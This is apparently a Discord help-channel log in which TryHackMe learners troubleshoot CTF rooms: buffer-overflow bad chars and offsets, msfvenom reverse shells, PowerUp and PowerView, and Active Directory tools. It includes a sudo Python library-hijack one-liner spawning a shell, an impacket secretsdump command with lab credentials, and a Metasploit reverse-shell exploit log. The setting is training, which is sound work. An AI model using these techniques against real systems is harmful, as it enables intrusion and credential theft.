Hello all, I have a question that is bugging my mind. On the offensive pentesting path, stack-based buffer overflows, I have this gimmick I could not see why I am encountering. I need to find the bad chars. But in all the trials, although \x00 is omitted, I keep getting \x01\x02 etc. When I add them to the bad chars in mona and remove them from the exploit itself, I still get the piece of the sequence.
#offensive-pentesting-path
If I remove \x00\x01 etc., the bad chars start from the next byte, \x02 in this example.
I am a bit confused, any help to make me understand will be greatly appreciated!
\x00 is a null byte that usually terminates strings. It's almost always a bad char.
Yes, so I need to omit it from the payload and from mona, which I do, but I keep getting the adjoining bytes.
I can't work out what you're saying.
You're meant to get the bytes in order, what is the problem?
The problem is, each time I rerun the exploit after omitting, it never reaches undefined.
There are always initial bytes remaining.
But since I remove the null byte,
should they not just disappear automatically?
for example, check my log :
Bad chars 1:
00 01 02 03 04 05 3e 3f e1 e2
Bad Chars 2:
00 01 02 03 04 05 3e 3f e1 e2
Bad Chars 3:
00 01 02 03 04 05 06 3e 3f e1 e2
Bad Chars 4:
00 01 02 03 04 05 06 07 3e 3f e1 e2
https://www.omegavo.id/binexp-corner-1-bofs.html#binexp-corner-1-bofs send all the badchars at once
OmegaVoid - Blog of Many Things
The first of what's hopefully going to be a series on binary exploitation. We'll take a look at Windows 32bit Stack Buffer Overflows and show you why they are exploited the way they are. We'll also dive into some considerations about Buffer Overflows in general. And present an example of how to develop an exploit via this technique.
You see the initial sequence? Each time they go +1, although in mona's bytearray.bin and in the payload they are removed.
Argh, I see, not one by one. Maybe this is the problem. Will do it again and let you know! Thanks @keen iris
Gave +1 Rep to @keen iris
Hi guys. I am solving Daily Bugle. I have an initial shell as apache. Can anyone give me a hint regarding horizontal priv esc?
are you still working on this?
Yup, I took a break. But will start now. Any hints are appreciated!
room: brainstorm, task 2: how many ports are open? nmap scans say ||3 open ports|| but the answer is wrong...
the answer is ||6||? how?!
which stage are you stuck on? i can give you some ideas
Hi all. In the Buffer Overflow Prep room, for overflow2, my offset is coming out as ||633|| but it seems the answer is ||634||. Is the problem the same for everyone, or is it just me?
@carmine locust you might not have copy pasted the entire cyclic pattern payload by accident
@carmine locust try doing that part again, and make sure to change the prefix of both fuzzer.py and exploit.py to overflow2
Yeah, I have been changing everything and then trying it but still it doesn't work
Can I dm you btw?
I have got a question regarding the BOF room, Task 6, OVERFLOW5. I did a lot of similar BOFs already for OSCP prep; they usually take me about 20-30 minutes. But this one just does not seem to work.
- Since I'm able to check if I found the correct offset and badchars, I know it must be something else.
- I know the msfvenom payload works, and the outgoing port 443 is not blocked because the payload worked for OVERFLOW4. (ip and port is correct)
- I see that the thread is created for my payload to execute
- I tried a lot of different paddings (also no padding)
- I even checked with a writeup and I did everything the same, even picked the same "jmp esp" address.
Is there anything left for me to check? Any hints what I might be missing?
Edit: Found the issue, I had a f***in typo in the msfvenom command in one of the badchars...like \xfD instead of \xfd. Apparently this is case-sensitive and I'm an idiot -.-
I think in my first one I had everything 'correct' except the slashes the wrong way in the retn.
For room: brainstorm, in which environment are we expected to do the BOF? There isn't a Windows environment provided in the lab, yeah?
Do we have to set up our own VM or what?
Correct
IIRC you want to match the target machine as close as possible
Is there a specific way to do that? Like it's not just creating a Windows VM, right?
It's just creating a windows VM
okay
Is it possible to just install Immunity Debugger on my Kali machine using Wine? Or is that not recommended?
I mean, I know it's possible. Just wondering if that's the norm or if it's typical to run it on some other VM.
Considering the environment would be different from an actual windows machine, no. People don't tend to do that.
Don't I need a product key to set up windows on a VM? Where do I get a viable product key?
Nope, you don't need one. A typical Windows 10 VM comes with 30 days' validity.
I just tried a Windows 10 iso from Microsoft using Virtualbox on the Kali Attackbox and it froze. I can't figure this out.
Get the VM from this link and try it with VMware.
Thanks, I'll try it. I've been trying the Brainstorm room for over a week and can't get past this part.
I know there is a 20GB download though but it worked for me so..
No problem. Take a short break and then try, you'll be able to work it out soon. 🙂
Hey guys. Quick question. Can a 32-bit privesc exploit (.exe, .ps1) work on a 64-bit system?
Potentially. It'll depend on the privesc
Thanks @keen iris for the quick reply 🙂. Can you please explain it a little further maybe with an example?
Gave +1 Rep to @keen iris
The code will run
But it could be a BOF etc., and offsets etc. might be different between 32- and 64-bit.
Alright @keen iris, I kinda got the idea. Thanks for helping me out 👍
I gotta say I really enjoyed the sky net challenge
Oh yea. It was a fun one
Hi people,
I started TryHackMe but got told it can actually open up my device to real hackers to hack into my machine.
Is there any truth in this, does anyone know? Thanks in advance for any answers.
This is a common warning on most platforms like this.
Not just TryHackMe.
You are connecting to a network with vulnerable machines; other people may also be connected too, so in theory your device may be exposed.
Depending on the VPN setup also.
Using virtual machines to connect, ensuring the firewall is up and no unneeded services are running will reduce this.
Of course, using the web-based attack boxes would remove this risk.
You are just in your browser only.
@drifting imp
Decided to spend today doing a write-up for it since I haven't done one before. Figured I should probably start building out a GitHub with all my write-ups.
Start a blog.
I started a little while ago
Started a Git repo. Thinking of using Medium or that as well.
I made a WordPress site
Don't use Medium. Hacking content is against their ToS and they've deleted entire accounts for posting write-ups.
God damn
Yep
Anyone know what this error is all about? Get-DomainComputer : The term 'Get-DomainComputer' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
I'm running PowerView.ps1 inside a Windows shell; I'm fairly certain Get-DomainComputer is the correct cmdlet.
I'm trying to run the command Get-DomainComputer | select operatingsystem
Did you import the PowerView module?
same error
I run . .\PowerView.ps1 and then Get-DomainComputer
Trying Get-DomainComputer | select OperatingSystem. Same error :/
Anyone know what gives? Just for reference, I'm in the room "Post-Exploitation Basics", task 2.
Alright, I figured it out. I ended up using ||Get-NetComputer -fulldata|| instead of Get-DomainComputer.
I know PowerView can be a little annoying, especially when Bloodhound gives you abuse info with cmdlets that aren't in PowerView anymore, but good on you for figuring it out!
Yeah. AD section completed! Now doing the extra credit rooms. Wish this PowerShell room came earlier lol.
Hi.
I have an odd problem with brainstorm.
So I tested my exploit locally and everything works perfectly but after changing the IP to the TryHackMe machine, the shell never comes back.
I've checked if I am connected to the VPN, I've checked if I entered the correct IP address in the msfvenom shell creation but still doesn't work
Currently doing the Buffer Overflow Prep room. On task 2 and placed my "pattern_create.rb". But it ran once with a "Sending Evil", and now it's saying not connected.
Did you restart the executable? In my experience, it’s probably best to close immunity debugger and set it up again every time you crash the application.
I think there’s also some kind of replay function in immunity, but I’ve never used it
Hi, can I get help with the Internal room?
I am not able to access the WordPress login page.
I could do a wpscan and brute-force it, but I can't use the creds to log in.
I saw in the forum that the same issue happened to some guys, but it is still not answered.
you might have to edit /etc/hosts and add internal.thm to the list of hostnames, with the machine IP
@shell radish and access it here: http://internal.thm/blog/wp-admin.php
In the PowerShell hacking room, when trying to find the number of installed cmdlets, I tried 2 commands: 1. Get-Module -ListAvailable | Import-Module ; gcm -co cmdlet | measure and 2. Get-Command | Where-Object -Property CommandType -eq cmdlet | measure. Both times I get the count 6641, which is not the right answer. Anyone know what I'm doing wrong?
@keen iris a third time
thank you so much, it worked
Gave +1 Rep to @edgy crypt
What paths should I complete first before doing the penetration testing path?
Particularly offensive security path
Depends on your current skill level
Hello, Where can I get help for the specific room or topic?
Well if it's about a room you might ask your question in #room-help
In the Gatekeeper room, the script firefox_decrypt just doesn't work. I tried my best, but can't get it to work. Any ideas?
Tx mate this helped me also
Hey all, currently doing Gatekeeper. Have gone through everything for the BO, but I cannot for the life of me get a connection. Would appreciate some help.
I keep on getting this error on Alfred when I type in python3 -m http.server:
```text
Traceback (most recent call last):
  File "/usr/lib/python3.6/runpy.py", line 193, in _run_module_as_main
    "__main__", mod_spec)
  File "/usr/lib/python3.6/runpy.py", line 85, in _run_code
    exec(code, run_globals)
  File "/usr/lib/python3.6/http/server.py", line 1211, in <module>
    test(HandlerClass=handler_class, port=args.port, bind=args.bind)
  File "/usr/lib/python3.6/http/server.py", line 1185, in test
    with ServerClass(server_address, HandlerClass) as httpd:
  File "/usr/lib/python3.6/socketserver.py", line 456, in __init__
    self.server_bind()
  File "/usr/lib/python3.6/http/server.py", line 136, in server_bind
    socketserver.TCPServer.server_bind(self)
  File "/usr/lib/python3.6/socketserver.py", line 470, in server_bind
    self.socket.bind(self.server_address)
OSError: [Errno 98] Address already in use
```
Can anyone help out? Very new to this, so apologies.
That means the default port for the http.server is already in use, try a different one, like python3 -m http.server 8080
I think I found a typo on the GameZone room. Is this the correct place to post details?
@dense gate is there a way I can take it out of use?
I can't get the listener to work.
Not sure what you're talking about?
sudo python3 -m http.server 80 kept on giving me an "already in use" error response.
You advised me to use port 8080 instead.
I'm basically trying to complete task 1 on Alfred to get the answer to question 3.
Well port 80 might be also in use already. So why don't you simply use port 8080 as I assume this one is not in use?
Thank you I’ve just managed to finish the room
congratz!
Btw, doing the "Buffer Overflow Prep" room: for anyone that has done the OSCP this year, are these examples still similar? Is there any limitation on using pwntools in the exam?
Who else is on hack the box
Literally everyone in here xD
Can anyone suggest what the average time to root a box in this path is? It just seems that some boxes are taking a long time to root...
It depends on your level & depth of knowledge but whatever it takes don't rush boxes, if you need time just take it slowly and learn at your own rhythm
How do I find the IP to attack in the Active Directory room?
It is, as always, the IP of the target that's displayed under Active Machine Information
I'm using the web browser attack box and I can't find the target IP anywhere.
@keen iris can you help here plz
It sounds like you're unfamiliar with how to use the platform
Deploy the target machine.
On the top it shows the ip of attack box
Thanks a lot ♥️♥️ @dense gate and @keen iris
Gave +1 Rep to @dense gate
Hey guys, is anybody here for a question?
First time, and I am having a problem about having too many machines open, I believe. I signed up for the AttackBox; when I click start AttackBox, I wait for it to open, and then I try to click start machine (to deploy the machine with the IP address and such) and I am obviously confusing something.
It says I can't have more than x machines open.
I am trying to run Vulnversity. I apologize for my ignorance; excited, but also know I don't know what I am doing
in terms of this layout.
When you finish rooms, do you make sure to hit the "terminate machine" button?
It's not necessary to, but I do it to save others' resources lol.
Finally completed this path, a lot to learn in here.
Hey all, on Brainpan 1. I have gone through and gotten most of the buffer overflow done. Based on my research my values for the various stages of the exploit script are correct; however, I cannot get a connection back when sending. Would appreciate any nudging if anyone has time.
Can anyone help with HackPark. Uploaded the exploit and then traversed to ?theme=../../App_Data/files. It gives me an OOPS error instead of the shell. Checked config, VPN and rebooted to 5 different boxes.
Did you update the exploit with correct ip and port?
Hello, has anyone completed Brainstorm?
I got into a very weird scenario:
- I could exploit chatserver.exe locally on a VM by overflowing the name, all normal, jumped to a shell from msfvenom, but remotely it simply crashed the server
- only when I changed my sploit to overflow the message could I indeed spawn a shell
Is this a normal scenario when fuzzing? Any ideas why it would work on my local Windows VM but not remotely?
thanks 😄
I guess it is because of the exposed vuln (quite massive in Windows boxes). Also the write-ups available cut through a shortcut, but checking the IIS conf gets the hint that the write-ups miss (they probably copied from one to another).
Are you overflowing the message or the username? Got the same issue and only the message got me the shell (for some reason I don't understand).
You can't overflow whatever you want. Before doing a buffer overflow, we have to identify the specific part of the program that's vulnerable (spiking). If you have the source code, this shouldn't be that bad, but if you don't, overflow each part of the program and see what happens.
Buffer overflow attacks are the result of not controlling how big a user's input can be. Sometimes this is controlled, and thus there is no overflow attack, or it isn't.
I've done it 3 weeks ago :))))
Thx for replying though.
Yeah, the thing is the binary was exploitable on both inputs on my Windows 7 VM (where I was able to run the buffer overflow over the username input, as well as the message)
(also spawning a shell as well).
Somehow on the remote machine this did not verify (only the message field was spawning me a shell).
I think I settled with maybe the OS being different, or even the actual binary the ___ server was providing in comparison to the service running -.-'
I'm no binary exploitation expert, so I don't know the exact reason. I can tell you that the user name field was not vulnerable to overflow
On the remote machine
yes that is correct
and the root of my surprise...
I was overwriting the EIP with some jmp esp on that statically linked binary, into some msfvenom payload with success (on the downloaded binary).
Then remotely it just crashed the service xD
I'm also no expert, but this kind of demotivated me the most, as I was very happy to first see the exploit running against my VM, to fail miserably on the remote machine xD
thx for the reply though
I feel that. When I first learned buffer overflows, for some reason, the offset I was getting from the debugger was one off from what it was in practice, so it definitely can be finicky at times.
The memory addresses can change between devices. Which is why you use a NOP sled to hit your payload. You just need to jump to an address somewhere on that sled rather than needing the exact address.
The address will be in the same general area on different devices, but there's no guarantee they'll be exactly the same.
So, when using something like a gadget we should prepend the payload with a bunch of NOPs to be sure we hit it from the beginning?
will give it a try
thank you 🙂
Yea. In general, your payload should be prepended by a bunch of NOPs. Then instead of aiming for 1 specific address you're aiming to hit somewhere within a chunk of addresses.
Yes. Updated IP to mine through my tun0 connection and the port settings also.
Congrats!
skynet had me pulling my hair
also I've noticed my terminals go away after like 2 hours ....
In the attacktive directory room, is anyone facing a problem with secretsdump.py file for Impacket?
If you're still looking for help,
- What impacket version are you on?
- What's your syntax
Hey hey guys, wassup! I am doing Steel Mountain, and while I try to get the initial foothold with Metasploit I get the message: This exploit may require manual cleanup of '%TEMP%\zYdDIPrYTNXE.vbs' on the target ......... then "exploit completed but no session was created". Rebooted the room, my VPN and the machine as well, but nothing changed. Anyone seen this before? Thanks!
That message is a warning, not an issue
Check your options.
Damn! I am missing something! Yesterday it was working, today the same settings don't! Aarggg, but thanks for the reply 🙂
Gave +1 Rep to @keen iris
Impacket 0.9.19 and the syntax is ||impacket-secretsdump -just-dc backup:backup2517860@10.10.75.218||
I've never seen impacket-secretsdump be the actual command, but if that's how you installed it then sure. Try removing the password from the syntax and putting it in manually.
Impacket is definitely one of the more finicky sets of tools.
oooooooo wait
You need the domain in the syntax:
||impacket-secretsdump -just-dc spookysec.local/backup:backup2517860@10.10.75.218||
I tried this too. Still it's showing an error.
That’s not a typical error hmmmm
Try this and use ‘!’ to nuke your impacket install and reinstall https://github.com/Dewalt-arch/pimpmykali
I'll be installing this for the first time lol. Let's see. And what do you mean by using '!' ?
Oh okay I got it now after running it
So it works now?
Yes. It's working now. Thanks a lot man! 😄
Gave +1 Rep to @harsh ocean
I guess this fixed the whole python installation in my kali. I was also facing a python related problem on the Gatekeeper room. Will try out that too after I'm done with this room.
Hey everyone, I'm doing Steel Mountain. I got the first root flag, but I wanted to upgrade my poor basic reverse shell to something more usable. So I tried to use multi/handler with a meterpreter payload, but the thing is my meterpreter shell is dying within 10 sec, so I don't have time to migrate it to something like lsass or else. Do you have any hints on how I can upgrade my shell?
Is this the service binary?
Do you see status 1053 where you started the service?
You're speaking about the vulnerable service?
I already managed to exploit it and restart it, if this is what you are wondering, and it gave me a reverse shell (root) on my listening nc. The thing is I want to improve this shell now (not asked in the box though).
Generate your meterpreter with -f exe-service rather than -f exe
Here's why
@dawn pollen
Oh okay thank you !
Hi, can anybody help me with Steel Mountain? I'm stuck on the PowerShell part.
What command are you trying and what is the output?
Just want to say, starting out TryHackMe and pentesting, what's good.
Hey there! For some reason I can't get any rev shells on my Kali. Win FW is off. This happened in Steel Mountain and HackPark. Tried tethering and my place's wifi. Same story. Ideas?
Make sure you're using your tun0 IP.
Yes man, it's my tun0. Thanks
Gave +1 Rep to @keen iris
You solved it?
After rebooting everything, disabling everything, changing server: YES it WORKED! I don't know how and why, but it did work! 🙂
Maybe you had OpenVPN started 2 or more times and therefore more than just a tun0 interface, so extras like tun1, tun2 etc. But who knows, at least it works now.
Is it possible to find on which port the application is running from immunity debugger?
Hey... Any nudge on getting PowerUp.ps1 running on Windows (Steel Mountain room / privesc part)? My head is melting.
When I load the PowerUp.ps1 module with . .\PowerUp.ps1, or alternatively try with powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}" from cmd, it just keeps returning errors about invalid tokens like:
```text
At C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerUp.ps1:2292 char:36
+ $ServiceCommand = "net localgroup $LocalGroup $UserNameToAdd /ad ...
+ ~~~
Unexpected token 'net' in expression or statement.
At C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerUp.ps1:2296 char:80
+ $ServiceCommand = "net user $UserNameToAdd $PasswordToAdd /add & ...
+ ~
The token '&&' is not a valid statement separator in this version.
At C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerUp.ps1:2296 char:96
+ ... & timeout /t 5 && net localgroup $LocalGroup $UserNameToAdd /add"
+ ~~
```
Anyone had something similar?
Problem in Game Zone:
In Task 5, Exposing services with reverse SSH tunnels:
ssh -L 10000:localhost:10000 <username>@<ip> didn't work,
but ssh -L 10000:127.0.0.1:10000 <username>@<ip> worked. WHY??
Also, in Metasploit, why do we have to set ssl to false?
If your machine doesn't have the localhost entry in your /etc/hosts file, you cannot refer to 127.0.0.1 as "localhost"
It's just an alias. 127.0.0.1 is the loopback address that allows you to refer to your own machine, to give the simple explanation.
Hey guys, I'm working on the Brainstorm room and I'm having trouble running chatserver.exe on any of my virtual Windows systems. I've tried Windows 7 32-bit and Windows 10 32-bit. Also, when I load chatserver.exe in Immunity Debugger and try to run it, the program crashes.
Download it in binary mode from FTP (or I might be thinking of a different room)
I have localhost set to 127.0.0.1 in /etc/hosts but still facing the same problem
Brainstorm: chatserver.exe is not opening on my Windows lab for testing.
My Windows is Win7 x64. Do I really need to create a 32-bit Windows env to test this one?
Did you download it in binary mode?
i used mget *
If you don't know if you downloaded it in binary mode, you didn't.
Download it in binary mode.
Read up about what you did differently
Brainstorm: I got a shell from chatserver.exe in my testing Windows lab, but I am not getting a shell from the target using the code.
I have changed the target IP and the msfvenom-generated payload for the listener according to TryHackMe's VPN IP in my Python script.
My code that didn't work when trying to do it on THM Brainstorm -
My code that did work when trying to do it on my lab -
Anyone who completed Brainstorm recently?
What OS have you used for chatserver.exe? I tried with Win 7 64-bit and Win XP SP1; none of them worked
to run the app
Nvm, figured it out, it was working on 32-bit and I used Win 7 Ultimate edition 32-bit.
@stuck stag can I DM you regarding Brainstorm?
sure
```text
gobuster dir -u http://10.10.129.202 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:                     http://10.10.129.202
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
2021/11/19 13:43:40 Starting gobuster in directory enumeration mode
Error: error on running gobuster: unable to connect to http://10.10.129.202/: Get "http://10.10.129.202/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
```
I am getting an error while running gobuster, can someone help me?
You sure that's the correct IP?
yes
Who can check the wp-login page in the Internal room for me?
Checking what?
Can you log in or not?
If you sent me in a DM the url of your target machine and the creds I can do it for you
OK, tx.
Hello, I've encountered a problem in the Daily Bugle room. I already created a revshell but am stuck on switching to the other user. Any non-spoiler hint?
Welp, never mind guys, somehow I copied an extra space into the password -,-
Wow I just finished the SKYNET box without looking at a walk-through. Feels awesome
Why do we need Set-ExecutionPolicy?? I know what it does by definition. But what are the **commands that won't work** without setting it to Unrestricted?
Anything
The execution policy defines what you can do with powershell on the system
I think by default it's RemoteSigned.
Which means that from a reverse shell, you won't be able to execute any PowerShell at all because your commands won't be signed correctly.
No...
PowerShell's execution policy is a safety feature that controls the conditions under which PowerShell loads configuration files and runs scripts. This feature helps prevent the execution of malicious scripts.
Is there a bug with HackPark on this path? I've completed all of the rooms in this path yet I'm still at 80% progress because of HackPark, even though I completed the room
Why can't it find the file?
It seems the file has the ending .txt.txt and not only .txt
lol, thanks
Gave +1 Rep to @dense gate
Hi
Hello guys, may someone kindly please help me with the Subdomain Enumeration task 6? I have failed to answer the question for close to one and a half weeks.
Hi all, I am looking for advice on Home Lab on PC. Please DM me. Thanks.
Hello 🙂 I have issues with the Brainstorm room (from the offensive pentest path). I cannot connect properly to my Windows VM and this room has already cost me a lot of days... Can someone help me, please? Probably I do something wrong when configuring the Windows VM, or maybe I am trying to connect to the wrong network, or I just do not have direct access from one of the VMs to the other.
Make sure that both of your VMs are on the same network settings. Ideally, you set both of them to NAT.
like this
NAT Network in VBox, otherwise they are isolated from each other.
VBox NAT gives the VMs 10.0.2.15 and isolates them from each other by default.
Good evening everyone. I have a question about the Brainpan 1 room. I was able to do the buffer overflow, but I'm confused: when I get access to the machine, I thought it was a Windows machine, but it looks like the machine is Linux and the Linux commands don't work.
Any suggestion? And also, is there someone who can explain to me what's going on 😄
There's something that lets you run Windows programs on Linux
Yeah, I have just tried to generate new shellcode for Linux. Thanks 🙂
Gave +1 Rep to @keen iris
I don't know if that will work but I'd read up about wine
Pretty sure using Linux shell code worked when I did that room iirc
Just for PoC. I know about Wine, I just didn't expect that the machine would be Linux, and the thing which confused me more was that I used shellcode for Windows but I spotted Linux directories and Linux commands didn't work 😵💫. However, I got root access and I was able to complete the challenge 🥳
Why does this lead to PE?
||echo "import subprocess;subprocess.call('/bin/sh');" > random.py
sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
with sudoers:
User alice may run the following commands on wonderland:
(rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py||
I get that I can run the walrus Python script as the rabbit user, but how does random.py create a subprocess in the walrus script when run?
User is allowed to run it as sudo — with root privileges
Rabbit calls a python script while running as root
While running as root the python script calls bash
I haven't done that one so can't really speak to it further, but that's the gist.
oh I think I figured it out with your help ... I'm going to have to do more research on python and how it calls libraries
thank you
You’re welcome
This is less a python thing and more how user and group permissions function
It is indeed related to the way that Python searches for imports using the sys.path and PYTHONPATH variables, and how it automatically executes any code included in an imported module. The docs are also pretty good for more info on this: https://docs.python.org/3/tutorial/modules.html#the-module-search-path
As far as I know you can add a write up to the room itself. If it's getting approved it will be listed on the write up section in that room
I meant share a write-up that I'd written in a comment; I don't know if that's considered self-promotion. I didn't submit it to the room because there are dozens already.
Oh okay, well you are not supposed to share write ups that are not approved I think. Got that told once when I shared one with someone who had an issue on a room.
changed, thanks for the tip
Gave +1 Rep to @dense gate
Hello 🙂 I need a hint for the GateKeeper room. I downloaded the .exe, but when running it on the windows machine I receive this error: "The code execution cannot proceed because VCRUNTIME140.dll was not found. Reinstalling the program may fix this problem."
I am using windows 10, 64bit, and the chatserver.exe was working fine on this machine
I found that it might be a problem with the VS version of the Redistributable, and I followed one guide - uninstall it and install the 2015 and then 2017. However, the 2015-2022 versions are with the same installer, so, it doesn't matter. However, this didn't work
Also, I saw that I have this dll in the C:\Windows\System32
Is it?
It's about hijacking a library.
Hey guys,
having some trouble in Brainstorm.
In my environment, I can create a reverse shell,
but when I attack the THM box, the reverse shell does not happen.
Tried to change ports, encoding, arch.
Nothing seems to work.
Any advice?
Just got it... no worries about my questioning above
Guys, does someone know what happens when we send shellcode? From the Python script, I tried different encodings and all of them seem to work, but the same shellcode from netcat is interpreted literally. I'm on Gatekeeper...
A common thing to do, especially for a sysadmin, is to execute shell commands. But what usually will end up in a bash or batch file, can be also done in Python.
I had this problem too and downloading the 32 bit version of the Redistributable worked for me.
Oh, good.. but did you download this version on 64-bit Windows, or did you also use 32-bit Windows?
I have 64-bit Windows. I think maybe because the program is 32-bit.
Great, thanks! I will try it out 🙂
Gave +1 Rep to @dusk nexus
Hey guys, I'm trying to solve the Kenobi machine, and while reading the website it says to search for a ProFTPD 1.3.5 exploit, but then after searching, the writing goes on without using any of the exploits. I want to know why.
And what will happen if I use the exploit? Will it give me the same result?
It worked, man. Thank you, again!
Gave +1 Rep to @dusk nexus
Glad to hear! Good to see my frustrations with the room helped someone else.
Yeah, really helped to me.. Last time I lost a lot of days for the Brainstorm room and the reason was only the network configuration of the machines, another person from the group gave me this hint 😄
Can anyone help me become a hacker, because I'm a noob? I mean I just know Python.
That's a very vague question.
First thing to realise is that hacking and programming are only very loosely interlinked.
Secondly, check out #start-here
I mean if I want to use some python library in hacking, I would like to know that
For the Retro room. Is there another way to get IE to pop up? Running Chrome and IE before running the .exe doesn't seem to work anymore.
Nvm.
pls, as to the Retro machine: I get a reverse shell and tried to connect with meterpreter, then when I try to run the "shell" command it gets disconnected (I was trying to run systeminfo to use on exploit suggester), so I tried to connect with xfreerdp and got user.txt, then I ran sysinfo but I am not allowed to copy from xfreerdp to kali, so any hints on what to do??
can you not run sysinfo from meterpreter?
Can anyone spare a few moments to help me understand something in the BufferOverflowPrep task 2?
I'm trying to answer the last question here. I successfully got the reverse shell, but I'm confused on why the answer I'm providing for the bad chars is incorrect for the question, yet it led me to a successful reverse shell.
Nevermind. Went back through the module and figured it out.
the result will be less than systeminfo from the cmd (to use in windows exploit suggester python script)
ok
so what do you mean when you run shell it disconnects? is there any error message?
meterpreter > shell
Process 3280 created.
Channel 0 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\inetpub\wwwroot\retro\wp-content\themes\90s-retro>systeminfo
Terminate channel 0? [y/N]
I completed the path , can anyone suggest me what to do next ?
Anyone have any recommendations for Immunity Debugger / mona plugin equivalents for my Kali box as Immunity Debugger is windows only.
When you do exploit development, you want your target/test machine to be as close to the real environment as possible
There is no good substitute as far as I know, you’ll have to spin up a Windows machine to make exploits for Windows
i see.
Man, finally finished Internal, it was really fkin hard
is anyone else having problems with the attack box? I'm using it for the time being
Anyone who solved gatekeeper recently? I don't get a shell back from msfconsole but I get a shell back the classic way
anyone tried Brainstorm recently (buffer overflow ctf)? I can get my payload working with a test environment locally, but when I try to run it on the target machine it just doesn't work, it just crashes and I need to start the machine all over again just to try again.
@balmy delta You're not the only one. I've been having the same issues.
So brainstorm, gatekeeper, malware re, brainpan, etc.
I'm starting to try to learn reverse engineering. What rooms should I start with? It's the one sub-field/thing on THM that just isn't clicking for me. Any recommendations? Or good online resources?
I actually was able to make it work after some trying. I don't know about the other rooms since I didn't start them, but with Brainstorm you need to fuzz the correct field when trying to run your payload on the target machine. For some reason, when you run the vulnerable app locally you can exploit it in the same fashion as the ones in the Buffer Overflow Prep room (https://tryhackme.com/room/bufferoverflowprep), but remotely this way will not work, you need to tweak the script a bit (I'll let you figure out how :P). I think this is a bug, but I can't point exactly at what the difference could be (maybe they use a slightly different binary in the target machine)
anyone have problems with the room Relevant? As soon as I run gobuster, even with a timeout etc., it goes for a while, 30 minutes or so? Then I get an exceeded error, and I can't run gobuster after that. I also can't terminate the room and restart it? What gives?
finished all the tasks on hackpark but it only shows 76% complete for the room, is there a bug in this room?
@pastel matrix relevant is a sensitive one. I had the same issue in the same spot. It takes a while and took a bunch of tries. You might have to increase your timeout up to 50-75..... depending on your network you might have to experiment a little bit. Try other tools like dirsearch.py, DirBuster, ffuf, etc. I recommend dirsearch.
@crimson bay If you are 100% certain that you didn't miss any buttons - you should post it on the forum and get in contact with an admin.
Maybe reset the room and submit your answers again?
Ok I have a question, am I just COMPLETELY out of practice or are the "guides" for Vulnversity extremely vague?
I will not say it's particularly vague but Yeah it kinda assumes you already have basic understanding of stuff and rooted a couple of boxes maybe.
I was just discussing this over in the room-help section.. If this is still a LEARNING path, the flow is out of order. It asks you to upload a file and try to find something that works, then it asks to set up burpsuite, then create a wordlist, then go back to burpsuite and intercept, then try to get intruder to work without setting up any payload, which doesn't work..
then finally upload the payload so it will actually work...
The flow is off. If it was rewritten along these lines it's much easier for a "refresher/learning" path..
And I don't mean step by step, but enough logical flow points..
1. you found the site, let's set up burpsuite and intercept an upload.
2. let's look at that intercept
3. let's create a wordlist
4. let's send that intercept into Intruder
5. let's find a payload we can use with PHP sites.
6. let's upload the payload..
Well the intruder part was for checking which extensions are blocked and if there is any we can use.
The flow may seem off to you maybe because they setup the word list in terminal
So you maybe like why open burp first
The flow is good in terms of having a good knowledge about target and having enumerated it before even trying to exploit.
Is there a room in THM that teaches us each phase in real-world pentest and how to generate reports?
After training pentest for a while, I seriously need some professional way to sharpen everything I learned
Hip Flask covers a lot of this
Would actually highly recommend it
You can also complete Wreath with the pentest report, that also has content on report writing
👍 Thanks sir! Finally I found what I need!
Gave +1 Rep to @sour moth
thanks @thorny swan, I will give that a shot.
is there a better alternative to nmap?
Better is very much subjective
not slow
Rustscan is very fast
But it might miss ports, or even take down the target if it's weak
hmm.. I'll check it out, I know of ncat and uni but rust seems to be the most popular option
ncat is not a port scanner? It's netcat?
netcat
Yeah.
That ain't a port scanner, but you can use it in scripts to function as one
It won't be fast though
It's not a portscanner, it can be used to make one with scripting
it's also going to depend what "edition" of netcat, most likely
There's at least 3
@keen iris Hello sir
@keen iris Can you accept my friend rq? I'm planning to take OSCP next year and have some question about this cert
I'm not a mod, but you should read the thm discord rules, especially rule 1 about sending friend requests etc. 🙂 Just a suggestion.
Whats good cats , just popping by and saying hi
Seems to be an issue with the way Vulnversity is being generated, I'm using the suggested rev shell and the server seems to crash frequently, have been through multiple restarts
@warm hinge what’s good
I am doing Steel Mountain now and I need some guidelines
I have connected the VPN and I have launched Metasploit
msf6 exploit(windows/http/rejetto_hfs_exec) > set rhosts 10.10.64.0
rhosts => 10.10.64.0
msf6 exploit(windows/http/rejetto_hfs_exec) > set rport 8080
rport => 8080
msf6 exploit(windows/http/rejetto_hfs_exec) > set lhost tun0
lhost => tun0
msf6 exploit(windows/http/rejetto_hfs_exec) > run
[*] Started reverse TCP handler on 10.9.3.76:4444
[*] Using URL: http://0.0.0.0:8080/0dIXeJp
[*] Local IP: http://10.10.10.128:8080/0dIXeJp
[*] Server started.
[*] Sending a malicious request to /
[*] Server stopped.
[!] This exploit may require manual cleanup of '%TEMP%\SNxqooLKcJ.vbs' on the target
[*] Exploit completed, but no session was created.
msf6 exploit(windows/http/rejetto_hfs_exec) >
Can anyone help me with what I am not doing right?
sometimes if you set lhost to tun0 it may mess up, just use the listener IP address itself and see if that helps
Thanks @fleet wedge but I have tried that option earlier and didn't work
Gave +1 Rep to @torn reef
I love doing the steel mountain exploit and I have no issues, don't know what the issue is for you, I may look into it
did you check sessions?
but I got a meterpreter when I used the web-based Kali machine. My challenge with the web-based Kali machine is that it is very slow
